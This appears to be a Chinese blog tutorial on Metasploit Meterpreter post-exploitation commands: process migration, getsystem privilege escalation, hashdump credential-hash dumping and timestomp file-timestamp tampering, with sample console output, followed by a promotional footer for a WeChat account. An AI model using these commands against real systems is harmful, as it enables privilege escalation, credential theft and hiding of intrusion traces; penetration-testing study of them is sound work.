# Metasploit高级后渗透模块

# 迁移到更安全的进程

migrate [要迁移到的进程id]
1

# 获取系统级权限

getsystem
1

注:getsystem模块在比较新的Windows系统中不太稳定,最好使用本地的提升权限方法和模块来提升控制权限。

meterpreter > getsystem
...got system via technique 1 (Named Pipe Impersonation (In Memory/Admin)).
1
2

# 获取密码的哈希值

run hashdump
1

获取了目标的系统级管理权限后,就可以使用hashdump命令获取被渗透系统上登录密码的哈希值。

# 修改文件的访问时间、修改时间和创建时间

这里用到的命令是timestomp

# 查看文件的时间信息

timestomp -v [目标文件]

meterpreter > timestomp -v e:\test.txt
[*] Showing MACE attributes for e:test.txt
Modified      : 2019-01-25 10:24:42 +0800
Accessed      : 2019-01-25 11:20:58 +0800
Created       : 2019-01-25 10:23:22 +0800
Entry Modified: 2019-01-25 10:24:42 +0800
1
2
3
4
5
6
7
8

# 修改文件的时间信息

timestomp -z [时间信息] [目标文件]
1

此时的时间信息格式为:MM/DD/YYYY HH24:MI:SS

meterpreter > timestomp -v e:\test.txt
[*] Showing MACE attributes for e:test.txt
Modified      : 2019-01-25 10:24:42 +0800
Accessed      : 2019-01-25 11:20:58 +0800
Created       : 2019-01-25 10:23:22 +0800
Entry Modified: 2019-01-25 10:24:42 +0800
meterpreter > 
meterpreter > timestomp -z "01/25/2019 11:00:00" e:\test.txt
[*] Setting specific MACE attributes on e:test.txt
meterpreter > timestomp -v e:\test.txt
[*] Showing MACE attributes for e:test.txt
Modified      : 2019-01-25 11:00:00 +0800
Accessed      : 2019-01-25 11:26:29 +0800
Created       : 2019-01-25 11:00:00 +0800
Entry Modified: 2019-01-25 11:00:00 +0800
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15

# 清空时间信息

timestomp -b [目标文件]

meterpreter > timestomp -b e:\test.txt
[*] Blanking file MACE attributes on e:test.txt
1
2
3
4

# 写在最后

如果你觉得冰河写的还不错,请微信搜索并关注「 冰河技术 」微信公众号,跟冰河学习高并发、分布式、微服务、大数据、互联网和云原生技术,「 冰河技术 」微信公众号更新了大量技术专题,每一篇技术文章干货满满!不少读者已经通过阅读「 冰河技术 」微信公众号文章,吊打面试官,成功跳槽到大厂;也有不少读者实现了技术上的飞跃,成为公司的技术骨干!如果你也想像他们一样提升自己的能力,实现技术能力的飞跃,进大厂,升职加薪,那就关注「 冰河技术 」微信公众号吧,每天更新超硬核技术干货,让你对如何提升技术能力不再迷茫!